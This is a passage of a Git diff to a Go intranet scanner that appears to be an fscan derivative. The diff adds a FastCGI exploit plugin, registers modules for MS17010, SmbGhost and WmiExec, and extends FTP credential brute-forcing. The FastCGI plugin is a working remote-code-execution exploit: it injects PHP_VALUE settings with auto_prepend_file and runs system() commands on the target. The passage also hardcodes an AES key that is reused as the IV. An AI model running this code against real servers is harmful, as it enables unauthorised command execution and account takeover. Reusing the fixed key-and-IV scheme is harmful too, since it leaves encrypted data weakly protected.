netbios1.NetDomainName = netbios2.NetDomainName
|
||||
netbios1.NetComputerName = netbios2.NetComputerName
|
||||
if netbios2.DomainName != "" {
|
||||
netbios1.DomainName = netbios2.DomainName
|
||||
}
|
||||
netbios1.OsVersion = netbios2.OsVersion
|
||||
return netbios1
|
||||
}
|
111
Plugins/base.go
111
Plugins/base.go
|
@ -1,18 +1,105 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"encoding/base64"
|
||||
"net"
|
||||
)
|
||||
|
||||
var PluginList = map[string]interface{}{
|
||||
"21": FtpScan,
|
||||
"22": SshScan,
|
||||
"135": Findnet,
|
||||
"445": SmbScan,
|
||||
"1433":MssqlScan,
|
||||
"3306": MysqlScan,
|
||||
"5432": PostgresScan,
|
||||
"6379": RedisScan,
|
||||
"9200":elasticsearchScan,
|
||||
"11211":MemcachedScan,
|
||||
"27017":MongodbScan,
|
||||
"21": FtpScan,
|
||||
"22": SshScan,
|
||||
"135": Findnet,
|
||||
"139": NetBIOS,
|
||||
"445": SmbScan,
|
||||
"1433": MssqlScan,
|
||||
"1521": OracleScan,
|
||||
"3306": MysqlScan,
|
||||
"3389": RdpScan,
|
||||
"5432": PostgresScan,
|
||||
"6379": RedisScan,
|
||||
"9000": FcgiScan,
|
||||
"11211": MemcachedScan,
|
||||
"27017": MongodbScan,
|
||||
"1000001": MS17010,
|
||||
"1000002": SmbGhost,
|
||||
"1000003":WebTitle,
|
||||
"1000003": WebTitle,
|
||||
"1000004": SmbScan2,
|
||||
"1000005": WmiExec,
|
||||
}
|
||||
|
||||
func ReadBytes(conn net.Conn) (result []byte, err error) {
|
||||
size := 4096
|
||||
buf := make([]byte, size)
|
||||
for {
|
||||
count, err := conn.Read(buf)
|
||||
if err != nil {
|
||||
break
|
||||
}
|
||||
result = append(result, buf[0:count]...)
|
||||
if count < size {
|
||||
break
|
||||
}
|
||||
}
|
||||
if len(result) > 0 {
|
||||
err = nil
|
||||
}
|
||||
return result, err
|
||||
}
|
||||
|
||||
var key = "0123456789abcdef"
|
||||
|
||||
func AesEncrypt(orig string, key string) string {
|
||||
// 转成字节数组
|
||||
origData := []byte(orig)
|
||||
k := []byte(key)
|
||||
// 分组秘钥
|
||||
// NewCipher该函数限制了输入k的长度必须为16, 24或者32
|
||||
block, _ := aes.NewCipher(k)
|
||||
// 获取秘钥块的长度
|
||||
blockSize := block.BlockSize()
|
||||
// 补全码
|
||||
origData = PKCS7Padding(origData, blockSize)
|
||||
// 加密模式
|
||||
blockMode := cipher.NewCBCEncrypter(block, k[:blockSize])
|
||||
// 创建数组
|
||||
cryted := make([]byte, len(origData))
|
||||
// 加密
|
||||
blockMode.CryptBlocks(cryted, origData)
|
||||
return base64.StdEncoding.EncodeToString(cryted)
|
||||
}
|
||||
func AesDecrypt(cryted string, key string) string {
|
||||
// 转成字节数组
|
||||
crytedByte, _ := base64.StdEncoding.DecodeString(cryted)
|
||||
k := []byte(key)
|
||||
// 分组秘钥
|
||||
block, _ := aes.NewCipher(k)
|
||||
// 获取秘钥块的长度
|
||||
blockSize := block.BlockSize()
|
||||
// 加密模式
|
||||
blockMode := cipher.NewCBCDecrypter(block, k[:blockSize])
|
||||
// 创建数组
|
||||
orig := make([]byte, len(crytedByte))
|
||||
// 解密
|
||||
blockMode.CryptBlocks(orig, crytedByte)
|
||||
// 去补全码
|
||||
orig = PKCS7UnPadding(orig)
|
||||
return string(orig)
|
||||
}
|
||||
|
||||
// 补码
|
||||
// AES加密数据块分组长度必须为128bit(byte[16]),密钥长度可以是128bit(byte[16])、192bit(byte[24])、256bit(byte[32])中的任意一个。
|
||||
func PKCS7Padding(ciphertext []byte, blocksize int) []byte {
|
||||
padding := blocksize - len(ciphertext)%blocksize
|
||||
padtext := bytes.Repeat([]byte{byte(padding)}, padding)
|
||||
return append(ciphertext, padtext...)
|
||||
}
|
||||
|
||||
// 去码
|
||||
func PKCS7UnPadding(origData []byte) []byte {
|
||||
length := len(origData)
|
||||
unpadding := int(origData[length-1])
|
||||
return origData[:(length - unpadding)]
|
||||
}
|
||||
|
|
|
@ -1,57 +0,0 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"crypto/tls"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"net"
|
||||
"net/http"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
)
|
||||
|
||||
func elasticsearchScan(info *common.HostInfo) error {
|
||||
_, err := geturl2(info)
|
||||
return err
|
||||
}
|
||||
|
||||
func geturl2(info *common.HostInfo) (flag bool, err error) {
|
||||
flag = false
|
||||
url := fmt.Sprintf("%s:%d/_cat", info.Url, common.PORTList["elastic"])
|
||||
var client = &http.Client{
|
||||
Timeout: time.Duration(info.WebTimeout) * time.Second,
|
||||
Transport: &http.Transport{
|
||||
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
|
||||
DisableKeepAlives: false,
|
||||
DialContext: (&net.Dialer{
|
||||
Timeout: time.Duration(info.WebTimeout) * time.Second,
|
||||
}).DialContext,
|
||||
},
|
||||
CheckRedirect: func(req *http.Request, via []*http.Request) error {
|
||||
return http.ErrUseLastResponse
|
||||
},
|
||||
}
|
||||
|
||||
res, err := http.NewRequest("GET", url, nil)
|
||||
if err == nil {
|
||||
res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
|
||||
res.Header.Add("Accept", "*/*")
|
||||
res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
|
||||
res.Header.Add("Accept-Encoding", "gzip, deflate")
|
||||
res.Header.Add("Connection", "close")
|
||||
resp, err := client.Do(res)
|
||||
|
||||
if err == nil {
|
||||
defer resp.Body.Close()
|
||||
body, _ := ioutil.ReadAll(resp.Body)
|
||||
if strings.Contains(string(body), "/_cat/master") {
|
||||
result := fmt.Sprintf("Elastic:%s unauthorized", url)
|
||||
common.LogSuccess(result)
|
||||
flag = true
|
||||
}
|
||||
}
|
||||
}
|
||||
return flag, err
|
||||
}
|
|
@ -0,0 +1,372 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"bytes"
|
||||
"encoding/binary"
|
||||
"errors"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"io"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
//links
|
||||
//https://xz.aliyun.com/t/9544
|
||||
//https://github.com/wofeiwo/webcgi-exploits
|
||||
|
||||
func FcgiScan(info *common.HostInfo) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
url := "/etc/issue"
|
||||
if common.Path != "" {
|
||||
url = common.Path
|
||||
}
|
||||
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
|
||||
var reqParams string
|
||||
var cutLine = "-----ASDGTasdkk361363s-----\n"
|
||||
switch {
|
||||
case common.Command == "read":
|
||||
reqParams = ""
|
||||
case common.Command != "":
|
||||
reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
|
||||
default:
|
||||
reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
|
||||
}
|
||||
|
||||
env := make(map[string]string)
|
||||
|
||||
env["SCRIPT_FILENAME"] = url
|
||||
env["DOCUMENT_ROOT"] = "/"
|
||||
env["SERVER_SOFTWARE"] = "go / fcgiclient "
|
||||
env["REMOTE_ADDR"] = "127.0.0.1"
|
||||
env["SERVER_PROTOCOL"] = "HTTP/1.1"
|
||||
|
||||
if len(reqParams) != 0 {
|
||||
env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams))
|
||||
env["REQUEST_METHOD"] = "POST"
|
||||
env["PHP_VALUE"] = "allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"
|
||||
} else {
|
||||
env["REQUEST_METHOD"] = "GET"
|
||||
}
|
||||
|
||||
fcgi, err := New(addr, common.Timeout)
|
||||
defer func() {
|
||||
if fcgi.rwc != nil {
|
||||
fcgi.rwc.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
|
||||
common.LogError(errlog)
|
||||
return
|
||||
}
|
||||
|
||||
stdout, stderr, err := fcgi.Request(env, reqParams)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
|
||||
common.LogError(errlog)
|
||||
return
|
||||
}
|
||||
|
||||
//1
|
||||
//Content-type: text/html
|
||||
//
|
||||
//uid=1001(www) gid=1001(www) groups=1001(www)
|
||||
|
||||
//2
|
||||
//Status: 404 Not Found
|
||||
//Content-type: text/html
|
||||
//
|
||||
//File not found.
|
||||
//Primary script unknown
|
||||
|
||||
//3
|
||||
//Status: 403 Forbidden
|
||||
//Content-type: text/html
|
||||
//
|
||||
//Access denied.
|
||||
//Access to the script '/etc/passwd' has been denied (see security.limit_extensions)
|
||||
var result string
|
||||
var output = string(stdout)
|
||||
if strings.Contains(string(stdout), cutLine) { //命令成功回显
|
||||
output = strings.SplitN(string(stdout), cutLine, 2)[0]
|
||||
if len(stderr) > 0 {
|
||||
result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr))
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, output)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
} else if strings.Contains(string(stdout), "File not found") || strings.Contains(string(stdout), "Content-type") || strings.Contains(string(stdout), "Status") {
|
||||
if len(stderr) > 0 {
|
||||
result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, string(stdout), string(stderr))
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, string(stdout))
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
}
|
||||
|
||||
// for padding so we don't have to allocate all the time
|
||||
// not synchronized because we don't care what the contents are
|
||||
var pad [maxPad]byte
|
||||
|
||||
const (
|
||||
FCGI_BEGIN_REQUEST uint8 = iota + 1
|
||||
FCGI_ABORT_REQUEST
|
||||
FCGI_END_REQUEST
|
||||
FCGI_PARAMS
|
||||
FCGI_STDIN
|
||||
FCGI_STDOUT
|
||||
FCGI_STDERR
|
||||
)
|
||||
|
||||
const (
|
||||
FCGI_RESPONDER uint8 = iota + 1
|
||||
)
|
||||
|
||||
const (
|
||||
maxWrite = 6553500 // maximum record body
|
||||
maxPad = 255
|
||||
)
|
||||
|
||||
type header struct {
|
||||
Version uint8
|
||||
Type uint8
|
||||
Id uint16
|
||||
ContentLength uint16
|
||||
PaddingLength uint8
|
||||
Reserved uint8
|
||||
}
|
||||
|
||||
func (h *header) init(recType uint8, reqId uint16, contentLength int) {
|
||||
h.Version = 1
|
||||
h.Type = recType
|
||||
h.Id = reqId
|
||||
h.ContentLength = uint16(contentLength)
|
||||
h.PaddingLength = uint8(-contentLength & 7)
|
||||
}
|
||||
|
||||
type record struct {
|
||||
h header
|
||||
buf [maxWrite + maxPad]byte
|
||||
}
|
||||
|
||||
func (rec *record) read(r io.Reader) (err error) {
|
||||
if err = binary.Read(r, binary.BigEndian, &rec.h); err != nil {
|
||||
return err
|
||||
}
|
||||
if rec.h.Version != 1 {
|
||||
return errors.New("fcgi: invalid header version")
|
||||
}
|
||||
n := int(rec.h.ContentLength) + int(rec.h.PaddingLength)
|
||||
if _, err = io.ReadFull(r, rec.buf[:n]); err != nil {
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (r *record) content() []byte {
|
||||
return r.buf[:r.h.ContentLength]
|
||||
}
|
||||
|
||||
type FCGIClient struct {
|
||||
mutex sync.Mutex
|
||||
rwc io.ReadWriteCloser
|
||||
h header
|
||||
buf bytes.Buffer
|
||||
keepAlive bool
|
||||
}
|
||||
|
||||
func New(addr string, timeout int64) (fcgi *FCGIClient, err error) {
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
|
||||
fcgi = &FCGIClient{
|
||||
rwc: conn,
|
||||
keepAlive: false,
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func (this *FCGIClient) writeRecord(recType uint8, reqId uint16, content []byte) (err error) {
|
||||
this.mutex.Lock()
|
||||
defer this.mutex.Unlock()
|
||||
this.buf.Reset()
|
||||
this.h.init(recType, reqId, len(content))
|
||||
if err := binary.Write(&this.buf, binary.BigEndian, this.h); err != nil {
|
||||
return err
|
||||
}
|
||||
if _, err := this.buf.Write(content); err != nil {
|
||||
return err
|
||||
}
|
||||
if _, err := this.buf.Write(pad[:this.h.PaddingLength]); err != nil {
|
||||
return err
|
||||
}
|
||||
_, err = this.rwc.Write(this.buf.Bytes())
|
||||
return err
|
||||
}
|
||||
|
||||
func (this *FCGIClient) writeBeginRequest(reqId uint16, role uint16, flags uint8) error {
|
||||
b := [8]byte{byte(role >> 8), byte(role), flags}
|
||||
return this.writeRecord(FCGI_BEGIN_REQUEST, reqId, b[:])
|
||||
}
|
||||
|
||||
func (this *FCGIClient) writeEndRequest(reqId uint16, appStatus int, protocolStatus uint8) error {
|
||||
b := make([]byte, 8)
|
||||
binary.BigEndian.PutUint32(b, uint32(appStatus))
|
||||
b[4] = protocolStatus
|
||||
return this.writeRecord(FCGI_END_REQUEST, reqId, b)
|
||||
}
|
||||
|
||||
func (this *FCGIClient) writePairs(recType uint8, reqId uint16, pairs map[string]string) error {
|
||||
w := newWriter(this, recType, reqId)
|
||||
b := make([]byte, 8)
|
||||
for k, v := range pairs {
|
||||
n := encodeSize(b, uint32(len(k)))
|
||||
n += encodeSize(b[n:], uint32(len(v)))
|
||||
if _, err := w.Write(b[:n]); err != nil {
|
||||
return err
|
||||
}
|
||||
if _, err := w.WriteString(k); err != nil {
|
||||
return err
|
||||
}
|
||||
if _, err := w.WriteString(v); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
w.Close()
|
||||
return nil
|
||||
}
|
||||
|
||||
func readSize(s []byte) (uint32, int) {
|
||||
if len(s) == 0 {
|
||||
return 0, 0
|
||||
}
|
||||
size, n := uint32(s[0]), 1
|
||||
if size&(1<<7) != 0 {
|
||||
if len(s) < 4 {
|
||||
return 0, 0
|
||||
}
|
||||
n = 4
|
||||
size = binary.BigEndian.Uint32(s)
|
||||
size &^= 1 << 31
|
||||
}
|
||||
return size, n
|
||||
}
|
||||
|
||||
func readString(s []byte, size uint32) string {
|
||||
if size > uint32(len(s)) {
|
||||
return ""
|
||||
}
|
||||
return string(s[:size])
|
||||
}
|
||||
|
||||
func encodeSize(b []byte, size uint32) int {
|
||||
if size > 127 {
|
||||
size |= 1 << 31
|
||||
binary.BigEndian.PutUint32(b, size)
|
||||
return 4
|
||||
}
|
||||
b[0] = byte(size)
|
||||
return 1
|
||||
}
|
||||
|
||||
// bufWriter encapsulates bufio.Writer but also closes the underlying stream when
|
||||
// Closed.
|
||||
type bufWriter struct {
|
||||
closer io.Closer
|
||||
*bufio.Writer
|
||||
}
|
||||
|
||||
func (w *bufWriter) Close() error {
|
||||
if err := w.Writer.Flush(); err != nil {
|
||||
w.closer.Close()
|
||||
return err
|
||||
}
|
||||
return w.closer.Close()
|
||||
}
|
||||
|
||||
func newWriter(c *FCGIClient, recType uint8, reqId uint16) *bufWriter {
|
||||
s := &streamWriter{c: c, recType: recType, reqId: reqId}
|
||||
w := bufio.NewWriterSize(s, maxWrite)
|
||||
return &bufWriter{s, w}
|
||||
}
|
||||
|
||||
// streamWriter abstracts out the separation of a stream into discrete records.
|
||||
// It only writes maxWrite bytes at a time.
|
||||
type streamWriter struct {
|
||||
c *FCGIClient
|
||||
recType uint8
|
||||
reqId uint16
|
||||
}
|
||||
|
||||
func (w *streamWriter) Write(p []byte) (int, error) {
|
||||
nn := 0
|
||||
for len(p) > 0 {
|
||||
n := len(p)
|
||||
if n > maxWrite {
|
||||
n = maxWrite
|
||||
}
|
||||
if err := w.c.writeRecord(w.recType, w.reqId, p[:n]); err != nil {
|
||||
return nn, err
|
||||
}
|
||||
nn += n
|
||||
p = p[n:]
|
||||
}
|
||||
return nn, nil
|
||||
}
|
||||
|
||||
func (w *streamWriter) Close() error {
|
||||
// send empty record to close the stream
|
||||
return w.c.writeRecord(w.recType, w.reqId, nil)
|
||||
}
|
||||
|
||||
func (this *FCGIClient) Request(env map[string]string, reqStr string) (retout []byte, reterr []byte, err error) {
|
||||
|
||||
var reqId uint16 = 1
|
||||
defer this.rwc.Close()
|
||||
|
||||
err = this.writeBeginRequest(reqId, uint16(FCGI_RESPONDER), 0)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = this.writePairs(FCGI_PARAMS, reqId, env)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if len(reqStr) > 0 {
|
||||
err = this.writeRecord(FCGI_STDIN, reqId, []byte(reqStr))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
rec := &record{}
|
||||
var err1 error
|
||||
|
||||
// recive untill EOF or FCGI_END_REQUEST
|
||||
for {
|
||||
err1 = rec.read(this.rwc)
|
||||
if err1 != nil {
|
||||
if err1 != io.EOF {
|
||||
err = err1
|
||||
}
|
||||
break
|
||||
}
|
||||
switch {
|
||||
case rec.h.Type == FCGI_STDOUT:
|
||||
retout = append(retout, rec.content()...)
|
||||
case rec.h.Type == FCGI_STDERR:
|
||||
reterr = append(reterr, rec.content()...)
|
||||
case rec.h.Type == FCGI_END_REQUEST:
|
||||
fallthrough
|
||||
default:
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
return
|
||||
}
|
|
@ -4,8 +4,7 @@ import (
|
|||
"bytes"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
@ -22,16 +21,20 @@ func Findnet(info *common.HostInfo) error {
|
|||
}
|
||||
|
||||
func FindnetScan(info *common.HostInfo) error {
|
||||
realhost := fmt.Sprintf("%s:%d", info.Host, 135)
|
||||
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer conn.Close()
|
||||
_, err = conn.Write(bufferV1)
|
||||
if err != nil {
|
||||
return err
|
||||
|
@ -67,7 +70,7 @@ func read(text []byte, host string) error {
|
|||
encodedStr := hex.EncodeToString(text)
|
||||
hostnames := strings.Replace(encodedStr, "0700", "", -1)
|
||||
hostname := strings.Split(hostnames, "000000")
|
||||
result := "NetInfo:\n[*]" + host
|
||||
result := "[*] NetInfo:\n[*]" + host
|
||||
for i := 0; i < len(hostname); i++ {
|
||||
hostname[i] = strings.Replace(hostname[i], "00", "", -1)
|
||||
host, err := hex.DecodeString(hostname[i])
|
||||
|
|
|
@ -3,12 +3,28 @@ package Plugins
|
|||
import (
|
||||
"fmt"
|
||||
"github.com/jlaffaye/ftp"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func FtpScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
flag, err := FtpConn(info, "anonymous", "")
|
||||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] ftp://%v:%v %v %v", info.Host, info.Ports, "anonymous", err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
for _, user := range common.Userdict["ftp"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
|
@ -16,9 +32,15 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
|
|||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] ftp %v %v %v %v %v", info.Host, common.PORTList["ftp"], user, pass, err)
|
||||
errlog := fmt.Sprintf("[-] ftp://%v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -27,13 +49,13 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, common.PORTList["ftp"], user, pass
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
|
||||
if err == nil {
|
||||
err = conn.Login(Username, Password)
|
||||
if err == nil {
|
||||
flag = true
|
||||
result := fmt.Sprintf("FTP:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
result := fmt.Sprintf("[+] ftp://%v:%v:%v %v", Host, Port, Username, Password)
|
||||
dirs, err := conn.List("")
|
||||
//defer conn.Logout()
|
||||
if err == nil {
|
||||
|
|
350
Plugins/icmp.go
350
Plugins/icmp.go
|
@ -3,63 +3,95 @@ package Plugins
|
|||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"golang.org/x/net/icmp"
|
||||
"log"
|
||||
"net"
|
||||
"os"
|
||||
"os/exec"
|
||||
"os/user"
|
||||
"runtime"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
var AliveHosts []string
|
||||
var (
|
||||
AliveHosts []string
|
||||
OS = runtime.GOOS
|
||||
ExistHosts = make(map[string]struct{})
|
||||
livewg sync.WaitGroup
|
||||
)
|
||||
|
||||
var SysInfo = GetSys()
|
||||
func CheckLive(hostslist []string, Ping bool) []string {
|
||||
chanHosts := make(chan string, len(hostslist))
|
||||
go func() {
|
||||
for ip := range chanHosts {
|
||||
if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) {
|
||||
ExistHosts[ip] = struct{}{}
|
||||
if common.Silent == false {
|
||||
if Ping == false {
|
||||
fmt.Printf("(icmp) Target %-15s is alive\n", ip)
|
||||
} else {
|
||||
fmt.Printf("(ping) Target %-15s is alive\n", ip)
|
||||
}
|
||||
}
|
||||
AliveHosts = append(AliveHosts, ip)
|
||||
}
|
||||
livewg.Done()
|
||||
}
|
||||
}()
|
||||
|
||||
type SystemInfo struct {
|
||||
OS string
|
||||
HostName string
|
||||
Groupid string
|
||||
Userid string
|
||||
Username string
|
||||
}
|
||||
|
||||
func GetSys() SystemInfo {
|
||||
var sysinfo SystemInfo
|
||||
|
||||
sysinfo.OS = runtime.GOOS
|
||||
name, err := os.Hostname()
|
||||
if err == nil {
|
||||
sysinfo.HostName = name
|
||||
if Ping == true {
|
||||
//使用ping探测
|
||||
RunPing(hostslist, chanHosts)
|
||||
} else {
|
||||
name = "none"
|
||||
//优先尝试监听本地icmp,批量探测
|
||||
conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
|
||||
if err == nil {
|
||||
RunIcmp1(hostslist, conn, chanHosts)
|
||||
} else {
|
||||
common.LogError(err)
|
||||
//尝试无监听icmp探测
|
||||
fmt.Println("trying RunIcmp2")
|
||||
conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err == nil {
|
||||
RunIcmp2(hostslist, chanHosts)
|
||||
} else {
|
||||
common.LogError(err)
|
||||
//使用ping探测
|
||||
fmt.Println("The current user permissions unable to send icmp packets")
|
||||
fmt.Println("start ping")
|
||||
RunPing(hostslist, chanHosts)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
u, err := user.Current()
|
||||
if err == nil {
|
||||
sysinfo.Groupid = u.Gid
|
||||
sysinfo.Userid = u.Uid
|
||||
sysinfo.Username = u.Username
|
||||
} else {
|
||||
sysinfo.Groupid = "1"
|
||||
sysinfo.Userid = "1"
|
||||
sysinfo.Username = name
|
||||
livewg.Wait()
|
||||
close(chanHosts)
|
||||
|
||||
if len(hostslist) > 1000 {
|
||||
arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true)
|
||||
for i := 0; i < len(arrTop); i++ {
|
||||
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i])
|
||||
common.LogSuccess(output)
|
||||
}
|
||||
}
|
||||
if len(hostslist) > 256 {
|
||||
arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false)
|
||||
for i := 0; i < len(arrTop); i++ {
|
||||
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i])
|
||||
common.LogSuccess(output)
|
||||
}
|
||||
}
|
||||
|
||||
return sysinfo
|
||||
return AliveHosts
|
||||
}
|
||||
|
||||
func IcmpCheck(hostslist []string) {
|
||||
TmpHosts := make(map[string]struct{})
|
||||
var chanHosts = make(chan string)
|
||||
conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
|
||||
func RunIcmp1(hostslist []string, conn *icmp.PacketConn, chanHosts chan string) {
|
||||
endflag := false
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
go func() {
|
||||
for {
|
||||
if endflag == true {
|
||||
|
@ -68,49 +100,118 @@ func IcmpCheck(hostslist []string) {
|
|||
msg := make([]byte, 100)
|
||||
_, sourceIP, _ := conn.ReadFrom(msg)
|
||||
if sourceIP != nil {
|
||||
livewg.Add(1)
|
||||
chanHosts <- sourceIP.String()
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
go func() {
|
||||
for ip := range chanHosts {
|
||||
if _, ok := TmpHosts[ip]; !ok {
|
||||
TmpHosts[ip] = struct{}{}
|
||||
fmt.Printf("(icmp) Target '%s' is alive\n", ip)
|
||||
AliveHosts = append(AliveHosts, ip)
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
for _, host := range hostslist {
|
||||
write(host, conn)
|
||||
dst, _ := net.ResolveIPAddr("ip", host)
|
||||
IcmpByte := makemsg(host)
|
||||
conn.WriteTo(IcmpByte, dst)
|
||||
}
|
||||
|
||||
if len(hostslist) > 255 {
|
||||
time.Sleep(6 * time.Second)
|
||||
} else {
|
||||
time.Sleep(3 * time.Second)
|
||||
//根据hosts数量修改icmp监听时间
|
||||
start := time.Now()
|
||||
for {
|
||||
if len(AliveHosts) == len(hostslist) {
|
||||
break
|
||||
}
|
||||
since := time.Now().Sub(start)
|
||||
var wait time.Duration
|
||||
switch {
|
||||
case len(hostslist) <= 256:
|
||||
wait = time.Second * 3
|
||||
default:
|
||||
wait = time.Second * 6
|
||||
}
|
||||
if since > wait {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
endflag = true
|
||||
close(chanHosts)
|
||||
conn.Close()
|
||||
}
|
||||
|
||||
func write(ip string, conn *icmp.PacketConn) {
|
||||
dst, _ := net.ResolveIPAddr("ip", ip)
|
||||
IcmpByte := []byte{8, 0, 247, 255, 0, 0, 0, 0}
|
||||
conn.WriteTo(IcmpByte, dst)
|
||||
func RunIcmp2(hostslist []string, chanHosts chan string) {
|
||||
num := 1000
|
||||
if len(hostslist) < num {
|
||||
num = len(hostslist)
|
||||
}
|
||||
var wg sync.WaitGroup
|
||||
limiter := make(chan struct{}, num)
|
||||
for _, host := range hostslist {
|
||||
wg.Add(1)
|
||||
limiter <- struct{}{}
|
||||
go func(host string) {
|
||||
if icmpalive(host) {
|
||||
livewg.Add(1)
|
||||
chanHosts <- host
|
||||
}
|
||||
<-limiter
|
||||
wg.Done()
|
||||
}(host)
|
||||
}
|
||||
wg.Wait()
|
||||
close(limiter)
|
||||
}
|
||||
|
||||
func icmpalive(host string) bool {
|
||||
startTime := time.Now()
|
||||
conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
if err := conn.SetDeadline(startTime.Add(6 * time.Second)); err != nil {
|
||||
return false
|
||||
}
|
||||
msg := makemsg(host)
|
||||
if _, err := conn.Write(msg); err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
receive := make([]byte, 60)
|
||||
if _, err := conn.Read(receive); err != nil {
